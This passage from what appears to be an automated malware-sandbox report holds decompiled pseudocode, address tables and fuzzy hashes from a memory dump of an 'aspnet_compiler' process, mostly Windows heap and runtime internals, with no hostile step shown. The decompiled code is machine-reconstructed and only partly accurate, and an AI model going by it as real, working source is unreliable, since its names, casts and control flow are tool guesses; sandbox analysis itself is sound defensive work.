                          				_t24 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                          				_t50 = _t24;
                          				if(_t50 != 0) {
                          					_t25 = _a4;
                          					if(_t25 == 5) {
                          						L3:
                          						_t39 = 0x14b1;
                          					} else {
                          						_t39 = 0x14b0;
                          						if(_t25 == 6) {
                          							goto L3;
                          						}
                          					}
                          					 *((short*)(_t50 + 6)) = _t39;
                          					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                          					_t11 = _t50 + 0x2c; // 0x2c
                          					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                          					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                          					E0143F3E0(_t11, _a12, _t46);
                          					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                          					if(E01417D50() == 0) {
                          						_t42 = 0x7ffe0384;
                          					} else {
                          						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          					}
                          					_push(_t50);
                          					_t19 = _t36 - 0x20; // 0xe
                          					_push(0x403);
                          					_push( *_t42 & 0x000000ff);
                          					E01439AE0();
                          					_t24 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                          				}
                          				return _t24;
                          			}













                          0x01477799
                          0x0147779a
                          0x0147779b
                          0x014777a3
                          0x014777ab
                          0x014777ae
                          0x014777b1
                          0x014777b1
                          0x014777bf
                          0x014777c4
                          0x014777c8
                          0x014777ce
                          0x014777d4
                          0x014777e0
                          0x014777e0
                          0x014777d6
                          0x014777d6
                          0x014777de
                          0x00000000
                          0x00000000
                          0x014777de
                          0x014777e5
                          0x014777f0
                          0x014777f3
                          0x014777f6
                          0x014777fd
                          0x01477800
                          0x0147780c
                          0x01477818
                          0x0147782b
                          0x0147781a
                          0x01477823
                          0x01477823
                          0x01477830
                          0x01477831
                          0x01477838
                          0x0147783d
                          0x0147783e
                          0x0147784f
                          0x0147784f
                          0x0147785a

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b9eef88475fbe0b3e56ae3b2a965bd731446ec11c19ca815ef90388359af9a
                          • Instruction ID: 3922c9044443545617966bc7babdc492fb97bdf8b786d0d1005ea908ad3eac49
                          • Opcode Fuzzy Hash: 98b9eef88475fbe0b3e56ae3b2a965bd731446ec11c19ca815ef90388359af9a
                          • Instruction Fuzzy Hash: 3F21AE72900604AFC725DF69D884EABBBB9EF98341F10056EF60AD7760D634E900CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0141AE73(intOrPtr __ecx, void* __edx) {
                          				intOrPtr _v8;
                          				void* _t19;
                          				char* _t22;
                          				signed char* _t24;
                          				intOrPtr _t25;
                          				intOrPtr _t27;
                          				void* _t31;
                          				intOrPtr _t36;
                          				char* _t38;
                          				signed char* _t42;
                          
                          				_push(__ecx);
                          				_t31 = __edx;
                          				_v8 = __ecx;
                          				_t19 = E01417D50();
                          				_t38 = 0x7ffe0384;
                          				if(_t19 != 0) {
                          					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          				} else {
                          					_t22 = 0x7ffe0384;
                          				}
                          				_t42 = 0x7ffe0385;
                          				if( *_t22 != 0) {
                          					if(E01417D50() == 0) {
                          						_t24 = 0x7ffe0385;
                          					} else {
                          						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          					}
                          					if(( *_t24 & 0x00000010) != 0) {
                          						goto L17;
                          					} else {
                          						goto L3;
                          					}
                          				} else {
                          					L3:
                          					_t27 = E01417D50();
                          					if(_t27 != 0) {
                          						_t27 =  *[fs:0x30];
                          						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                          					}
                          					if( *_t38 != 0) {
                          						_t27 =  *[fs:0x30];
                          						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                          							goto L5;
                          						}
                          						_t27 = E01417D50();
                          						if(_t27 != 0) {
                          							_t27 =  *[fs:0x30];
                          							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                          						}
                          						if(( *_t42 & 0x00000020) != 0) {
                          							L17:
                          							_t25 = _v8;
                          							_t36 = 0;
                          							if(_t25 != 0) {
                          								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                          							}
                          							_t27 = E01477794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                          						}
                          						goto L5;
                          					} else {
                          						L5:
                          						return _t27;
                          					}
                          				}
                          			}













                          0x0141ae78
                          0x0141ae7c
                          0x0141ae7e
                          0x0141ae81
                          0x0141ae86
                          0x0141ae8d
                          0x01462691
                          0x0141ae93
                          0x0141ae93
                          0x0141ae93
                          0x0141ae98
                          0x0141ae9d
                          0x014626a2
                          0x014626b4
                          0x014626a4
                          0x014626ad
                          0x014626ad
                          0x014626b9
                          0x00000000
                          0x014626bb
                          0x00000000
                          0x014626bb
                          0x0141aea3
                          0x0141aea3
                          0x0141aea3
                          0x0141aeaa
                          0x014626c0
                          0x014626c9
                          0x014626c9
                          0x0141aeb3
                          0x014626d4
                          0x014626e1
                          0x00000000
                          0x00000000
                          0x014626e7
                          0x014626ee
                          0x014626f0
                          0x014626f9
                          0x014626f9
                          0x01462702
                          0x01462708
                          0x01462708
                          0x0146270b
                          0x0146270f
                          0x01462711
                          0x01462711
                          0x01462725
                          0x01462725
                          0x00000000
                          0x0141aeb9
                          0x0141aeb9
                          0x0141aebf
                          0x0141aebf
                          0x0141aeb3

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                          • Instruction ID: 30b5c0cd8d48c31177c3b480619aa550c16e3c7a0b460f2e8944d0453dbcbe67
                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                          • Instruction Fuzzy Hash: ED210472602685AFE7129B29C944F267BE8EF10354F1900A2DD088B3B6D7B8DC41C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0142FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				void* _t19;
                          				intOrPtr _t29;
                          				intOrPtr _t32;
                          				intOrPtr _t35;
                          				intOrPtr _t37;
                          				intOrPtr* _t40;
                          
                          				_t35 = __edx;
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t37 = 0;
                          				_v8 = __edx;
                          				_t29 = __ecx;
                          				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                          					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                          					L3:
                          					_t19 = _a4 - 4;
                          					if(_t19 != 0) {
                          						if(_t19 != 1) {
                          							L7:
                          							return _t37;
                          						}
                          						if(_t35 == 0) {
                          							L11:
                          							_t37 = 0xc000000d;
                          							goto L7;
                          						}
                          						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                          							_t35 = _v8;
                          						}
                          						 *((intOrPtr*)(_t40 + 4)) = _t35;
                          						goto L7;
                          					}
                          					if(_t29 == 0) {
                          						goto L11;
                          					}
                          					_t32 =  *_t40;
                          					if(_t32 != 0) {
                          						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                          						E014076E2( *_t40);
                          					}
                          					 *_t40 = _t29;
                          					goto L7;
                          				}
                          				_t40 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                          				if(_t40 == 0) {
                          					_t37 = 0xc0000017;
                          					goto L7;
                          				}
                          				_t35 = _v8;
                          				 *_t40 = 0;
                          				 *((intOrPtr*)(_t40 + 4)) = 0;
                          				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                          				goto L3;
                          			}










                          0x0142fd9b
                          0x0142fda0
                          0x0142fda1
                          0x0142fdab
                          0x0142fdad
                          0x0142fdb0
                          0x0142fdb8
                          0x0142fe0f
                          0x0142fde6
                          0x0142fde9
                          0x0142fdec
                          0x0146c0c0
                          0x0142fdfe
                          0x0142fe06
                          0x0142fe06
                          0x0146c0c8
                          0x0142fe2d
                          0x0142fe2d
                          0x00000000
                          0x0142fe2d
                          0x0146c0d1
                          0x0146c0e0
                          0x0146c0e5
                          0x0146c0e5
                          0x0146c0e8
                          0x00000000
                          0x0146c0e8
                          0x0142fdf4
                          0x00000000
                          0x00000000
                          0x0142fdf6
                          0x0142fdfa
                          0x0142fe1a
                          0x0142fe1f
                          0x0142fe1f
                          0x0142fdfc
                          0x00000000
                          0x0142fdfc
                          0x0142fdcc
                          0x0142fdd0
                          0x0142fe26
                          0x00000000
                          0x0142fe26
                          0x0142fdd8
                          0x0142fddb
                          0x0142fddd
                          0x0142fde0
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                          • Instruction ID: 4dd50cc68e770f9307059c2b1ea931ec0c84f5c9f97c8d2f17c2b90d1b2b0fdf
                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                          • Instruction Fuzzy Hash: 9B217C72600651DBD732CF4EC540E66B7F5EBA4A10FA4857FE95A87B21D730AC46CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E0142B390(void* __ecx, intOrPtr _a4) {
                          				signed int _v8;
                          				signed char _t12;
                          				signed int _t16;
                          				signed int _t21;
                          				void* _t28;
                          				signed int _t30;
                          				signed int _t36;
                          				signed int _t41;
                          
                          				_push(__ecx);
                          				_t41 = _a4 + 0xffffffb8;
                          				E01412280(_t12, 0x14e8608);
                          				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                          				asm("sbb edi, edi");
                          				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                          				_v8 = _t36;
                          				asm("lock cmpxchg [ebx], ecx");
                          				_t30 = 1;
                          				if(1 != 1) {
                          					while(1) {
                          						_t21 = _t30 & 0x00000006;
                          						_t16 = _t30;
                          						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                          						asm("lock cmpxchg [edi], esi");
                          						if(_t16 == _t30) {
                          							break;
                          						}
                          						_t30 = _t16;
                          					}
                          					_t36 = _v8;
                          					if(_t21 == 2) {
                          						_t16 = E014300C2(0x14e8608, 0, _t28);
                          					}
                          				}
                          				if(_t36 != 0) {
                          					_t16 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                          				}
                          				return _t16;
                          			}











                          0x0142b395
                          0x0142b3a2
                          0x0142b3a5
                          0x0142b3aa
                          0x0142b3b2
                          0x0142b3ba
                          0x0142b3bd
                          0x0142b3c0
                          0x0142b3c4
                          0x0142b3c9
                          0x0146a3e9
                          0x0146a3ed
                          0x0146a3f0
                          0x0146a3ff
                          0x0146a403
                          0x0146a409
                          0x00000000
                          0x00000000
                          0x0146a40b
                          0x0146a40b
                          0x0146a40f
                          0x0146a415
                          0x0146a423
                          0x0146a423
                          0x0146a415
                          0x0142b3d1
                          0x0142b3e8
                          0x0142b3e8
                          0x0142b3d9

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                          • Instruction ID: e0a96bca3a660650f791d73e320b2c758d1190017884981bf62bd99ab8f6fba4
                          • Opcode Fuzzy Hash: 5b98abe779d87b058a1701ff3b1c1db71b400d9f3f8a5485a4a9a374ba07ae12
                          • Instruction Fuzzy Hash: D31148333011219BCB2A8A298D81A6B739AEBD5230B34412FDD16D73B0CA71AC42C695
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E013F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _t33;
                          				intOrPtr _t37;
                          				intOrPtr _t41;
                          				intOrPtr* _t46;
                          				void* _t48;
                          				intOrPtr _t50;
                          				intOrPtr* _t60;
                          				void* _t61;
                          				intOrPtr _t62;
                          				intOrPtr _t65;
                          				void* _t66;
                          				void* _t68;
                          
                          				_push(0xc);
                          				_push(0x14cf708);
                          				E0144D08C(__ebx, __edi, __esi);
                          				_t65 = __ecx;
                          				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                          				if( *(__ecx + 0x24) != 0) {
                          					_push( *(__ecx + 0x24));
                          					E014395D0();
                          					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                          				}
                          				L6();
                          				L6();
                          				_push( *((intOrPtr*)(_t65 + 0x28)));
                          				E014395D0();
                          				_t33 =  *0x14e84c4; // 0x0
                          				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                          				_t37 =  *0x14e84c4; // 0x0
                          				L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                          				_t41 =  *0x14e84c4; // 0x0
                          				E01412280(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x14e86b4);
                          				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                          				_t46 = _t65 + 0xe8;
                          				_t62 =  *_t46;
                          				_t60 =  *((intOrPtr*)(_t46 + 4));
                          				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                          					_t61 = 3;
                          					asm("int 0x29");
                          					_push(_t65);
                          					_t66 = _t61;
                          					_t23 = _t66 + 0x14; // 0x8df8084c
                          					_push( *_t23);
                          					E014395D0();
                          					_t24 = _t66 + 0x10; // 0x89e04d8b
                          					_push( *_t24);
                          					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                          					_t48 = E014395D0();
                          					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                          					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                          					return _t48;
                          				} else {
                          					 *_t60 = _t62;
                          					 *((intOrPtr*)(_t62 + 4)) = _t60;
                          					 *(_t68 - 4) = 0xfffffffe;
                          					E013F9325();
                          					_t50 =  *0x14e84c4; // 0x0
                          					return E0144D0D1(L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                          				}
                          			}















                          0x013f9240
                          0x013f9242
                          0x013f9247
                          0x013f924c
                          0x013f924e
                          0x013f9255
                          0x013f9257
                          0x013f925a
                          0x013f925f
                          0x013f925f
                          0x013f9266
                          0x013f9271
                          0x013f9276
                          0x013f9279
                          0x013f927e
                          0x013f9295
                          0x013f929a
                          0x013f92b1
                          0x013f92b6
                          0x013f92d7
                          0x013f92dc
                          0x013f92e0
                          0x013f92e6
                          0x013f92e8
                          0x013f92ee
                          0x013f9332
                          0x013f9333
                          0x013f9337
                          0x013f9338
                          0x013f933a
                          0x013f933a
                          0x013f933d
                          0x013f9342
                          0x013f9342
                          0x013f9345
                          0x013f9349
                          0x013f934e
                          0x013f9352
                          0x013f9357
                          0x013f92f4
                          0x013f92f4
                          0x013f92f6
                          0x013f92f9
                          0x013f9300
                          0x013f9306
                          0x013f9324
                          0x013f9324

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                          • Instruction ID: 59874f404da3e11ce18a95bf2d7b1fef2738fdb3f68e608325ccdefef8d4206f
                          • Opcode Fuzzy Hash: 163fa4f7a9ffa117d98950af399857fd1f83d069cf6a211b13c0898b491e3646
                          • Instruction Fuzzy Hash: 06212872041602DFC722EF69CA40F59B7F9FF28708F1445AEA1598B6B2DB35E941CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E01484257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                          				intOrPtr* _t18;
                          				intOrPtr _t24;
                          				intOrPtr* _t27;
                          				intOrPtr* _t30;
                          				intOrPtr* _t31;
                          				intOrPtr _t33;
                          				intOrPtr* _t34;
                          				intOrPtr* _t35;
                          				void* _t37;
                          				void* _t38;
                          				void* _t39;
                          				void* _t43;
                          
                          				_t39 = __eflags;
                          				_t35 = __edi;
                          				_push(8);
                          				_push(0x14d08d0);
                          				E0144D08C(__ebx, __edi, __esi);
                          				_t37 = __ecx;
                          				E014841E8(__ebx, __edi, __ecx, _t39);
                          				E0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                          				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                          				_t18 = _t37 + 8;
                          				_t33 =  *_t18;
                          				_t27 =  *((intOrPtr*)(_t18 + 4));
                          				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                          					L8:
                          					_push(3);
                          					asm("int 0x29");
                          				} else {
                          					 *_t27 = _t33;
                          					 *((intOrPtr*)(_t33 + 4)) = _t27;
                          					_t35 = 0x14e87e4;
                          					_t18 =  *0x14e87e0; // 0x0
                          					while(_t18 != 0) {
                          						_t43 = _t18 -  *0x14e5cd0; // 0xffffffff
                          						if(_t43 >= 0) {
                          							_t31 =  *0x14e87e4; // 0x0
                          							_t18 =  *_t31;
                          							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                          								goto L8;
                          							} else {
                          								 *0x14e87e4 = _t18;
                          								 *((intOrPtr*)(_t18 + 4)) = _t35;
                          								L013F7055(_t31 + 0xfffffff8);
                          								_t24 =  *0x14e87e0; // 0x0
                          								_t18 = _t24 - 1;
                          								 *0x14e87e0 = _t18;
                          								continue;
                          							}
                          						}
                          						goto L9;
                          					}
                          				}
                          				L9:
                          				__eflags =  *0x14e5cd0;
                          				if( *0x14e5cd0 <= 0) {
                          					L013F7055(_t37);
                          				} else {
                          					_t30 = _t37 + 8;
                          					_t34 =  *0x14e87e8; // 0x0
                          					__eflags =  *_t34 - _t35;
                          					if( *_t34 != _t35) {
                          						goto L8;
                          					} else {
                          						 *_t30 = _t35;
                          						 *((intOrPtr*)(_t30 + 4)) = _t34;
                          						 *_t34 = _t30;
                          						 *0x14e87e8 = _t30;
                          						 *0x14e87e0 = _t18 + 1;
                          					}
                          				}
                          				 *(_t38 - 4) = 0xfffffffe;
                          				return E0144D0D1(L01484320());
                          			}















                          0x01484257
                          0x01484257
                          0x01484257
                          0x01484259
                          0x0148425e
                          0x01484263
                          0x01484265
                          0x01484273
                          0x01484278
                          0x0148427c
                          0x0148427f
                          0x01484281
                          0x01484287
                          0x014842d7
                          0x014842d7
                          0x014842da
                          0x0148428d
                          0x0148428d
                          0x0148428f
                          0x01484292
                          0x01484297
                          0x0148429c
                          0x014842a0
                          0x014842a6
                          0x014842a8
                          0x014842ae
                          0x014842b3
                          0x00000000
                          0x014842ba
                          0x014842ba
                          0x014842bf
                          0x014842c5
                          0x014842ca
                          0x014842cf
                          0x014842d0
                          0x00000000
                          0x014842d0
                          0x014842b3
                          0x00000000
                          0x014842a6
                          0x0148429c
                          0x014842dc
                          0x014842dc
                          0x014842e3
                          0x01484309
                          0x014842e5
                          0x014842e5
                          0x014842e8
                          0x014842ee
                          0x014842f0
                          0x00000000
                          0x014842f2
                          0x014842f2
                          0x014842f4
                          0x014842f7
                          0x014842f9
                          0x01484300
                          0x01484300
                          0x014842f0
                          0x0148430e
                          0x0148431f

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                          • Instruction ID: d8f80332b8b9869bada69266722f5c0cd674c89d74de11e7cf643d3326648fe1
                          • Opcode Fuzzy Hash: 6b502a4b8bec3fc9084adf3a56ccff52459d5ab447c38e7d06d801ad7b466de5
                          • Instruction Fuzzy Hash: 20215874A40607CFCB25EF69D500B19BBE1FB95398B28826FD1058F3BADB319491CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 25%
                          			E01422397(intOrPtr _a4) {
                          				void* __ebx;
                          				void* __ecx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t11;
                          				void* _t19;
                          				void* _t25;
                          				void* _t26;
                          				intOrPtr _t27;
                          				void* _t28;
                          				void* _t29;
                          
                          				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                          				if( *0x14e848c != 0) {
                          					L0141FAD0(0x14e8610);
                          					if( *0x14e848c == 0) {
                          						E0141FA00(0x14e8610, _t19, _t27, 0x14e8610);
                          						goto L1;
                          					} else {
                          						_push(0);
                          						_push(_a4);
                          						_t26 = 4;
                          						_t29 = E01422581(0x14e8610, 0x13d50a0, _t26, _t27, _t28);
                          						E0141FA00(0x14e8610, 0x13d50a0, _t27, 0x14e8610);
                          					}
                          				} else {
                          					L1:
                          					_t11 =  *0x14e8614; // 0x0
                          					if(_t11 == 0) {
                          						_t11 = E01434886(0x13d1088, 1, 0x14e8614);
                          					}
                          					_push(0);
                          					_push(_a4);
                          					_t25 = 4;
                          					_t29 = E01422581(0x14e8610, (_t11 << 4) + 0x13d5070, _t25, _t27, _t28);
                          				}
                          				if(_t29 != 0) {
                          					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                          					 *((char*)(_t29 + 0x40)) = 0;
                          				}
                          				return _t29;
                          			}















                          0x014223b0
                          0x014223b6
                          0x01422409
                          0x01422415
                          0x01465ae9
                          0x00000000
                          0x0142241b
                          0x0142241b
                          0x0142241d
                          0x01422427
                          0x0142242e
                          0x01422430
                          0x01422430
                          0x014223b8
                          0x014223b8
                          0x014223b8
                          0x014223bf
                          0x014223fc
                          0x014223fc
                          0x014223c1
                          0x014223c3
                          0x014223d0
                          0x014223d8
                          0x014223d8
                          0x014223dc
                          0x014223de
                          0x014223e1
                          0x014223e1
                          0x014223ec

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                          • Instruction ID: 50675a7faf466caf8fd434145954580177961da168b493627903a0999fd5aa7b
                          • Opcode Fuzzy Hash: 7c34901056f31433e12fbc4e48a9ddc894700daea856dacb55031c54a8defabb
                          • Instruction Fuzzy Hash: 3E112B3274431267EB30AA3AAC40F16B6D8FB70651F54852FF60ADB271D6F4D889C754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E014746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                          				signed short* _v8;
                          				unsigned int _v12;
                          				intOrPtr _v16;
                          				signed int _t22;
                          				signed char _t23;
                          				short _t32;
                          				void* _t38;
                          				char* _t40;
                          
                          				_v12 = __edx;
                          				_t29 = 0;
                          				_v8 = __ecx;
                          				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                          				_t38 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                          				if(_t38 != 0) {
                          					_t40 = _a4;
                          					 *_t40 = 1;
                          					E0143F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                          					_t22 = _v12 >> 1;
                          					_t32 = 0x2e;
                          					 *((short*)(_t38 + _t22 * 2)) = _t32;
                          					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                          					_t23 = E0142D268(_t38, 1);
                          					asm("sbb al, al");
                          					 *_t40 =  ~_t23 + 1;
                          					L014177F0(_v16, 0, _t38);
                          				} else {
                          					 *_a4 = 0;
                          					_t29 = 0xc0000017;
                          				}
                          				return _t29;
                          			}











                          0x014746b7
                          0x014746ba
                          0x014746c5
                          0x014746c8
                          0x014746d0
                          0x014746d4
                          0x014746e6
                          0x014746e9
                          0x014746f4
                          0x014746ff
                          0x01474705
                          0x01474706
                          0x0147470c
                          0x01474713
                          0x0147471b
                          0x01474723
                          0x01474725
                          0x014746d6
                          0x014746d9
                          0x014746db
                          0x014746db
                          0x01474732

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                          • Instruction ID: 6e925b0eafaf03a2b94e5e610e2bd2a7168e0825786c1bec0c45434ae9f4870c
                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                          • Instruction Fuzzy Hash: 6B112572904208BBC7019F6DD8808BEB7B9EFA9300F10806EF944C7360DA318D55C7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 42%
                          			E013FC962(char __ecx) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t19;
                          				char _t22;
                          				void* _t26;
                          				void* _t27;
                          				char _t32;
                          				char _t34;
                          				void* _t35;
                          				void* _t37;
                          				intOrPtr* _t38;
                          				signed int _t39;
                          
                          				_t41 = (_t39 & 0xfffffff8) - 0xc;
                          				_v8 =  *0x14ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                          				_t34 = __ecx;
                          				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                          					_t26 = 0;
                          					E0140EEF0(0x14e70a0);
                          					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                          					if(E0147F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                          						L9:
                          						E0140EB70(_t29, 0x14e70a0);
                          						_t19 = _t26;
                          						L2:
                          						_pop(_t35);
                          						_pop(_t37);
                          						_pop(_t27);
                          						return E0143B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                          					}
                          					_t29 = _t34;
                          					_t26 = E0147F1FC(_t34, _t32);
                          					if(_t26 < 0) {
                          						goto L9;
                          					}
                          					_t38 =  *0x14e70c0; // 0x0
                          					while(_t38 != 0x14e70c0) {
                          						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                          						_t38 =  *_t38;
                          						_v12 = _t22;
                          						if(_t22 != 0) {
                          							_t29 = _t22;
                          							 *0x14eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                          							_v12();
                          						}
                          					}
                          					goto L9;
                          				}
                          				_t19 = 0;
                          				goto L2;
                          			}


















                          0x013fc96a
                          0x013fc974
                          0x013fc988
                          0x013fc98a
                          0x01467c9d
                          0x01467c9f
                          0x01467ca4
                          0x01467cae
                          0x01467cf0
                          0x01467cf5
                          0x01467cfa
                          0x013fc992
                          0x013fc996
                          0x013fc997
                          0x013fc998
                          0x013fc9a3
                          0x013fc9a3
                          0x01467cb0
                          0x01467cb7
                          0x01467cbb
                          0x00000000
                          0x00000000
                          0x01467cbd
                          0x01467ce8
                          0x01467cc5
                          0x01467cc8
                          0x01467cca
                          0x01467cd0
                          0x01467cd6
                          0x01467cde
                          0x01467ce4
                          0x01467ce4
                          0x01467cd0
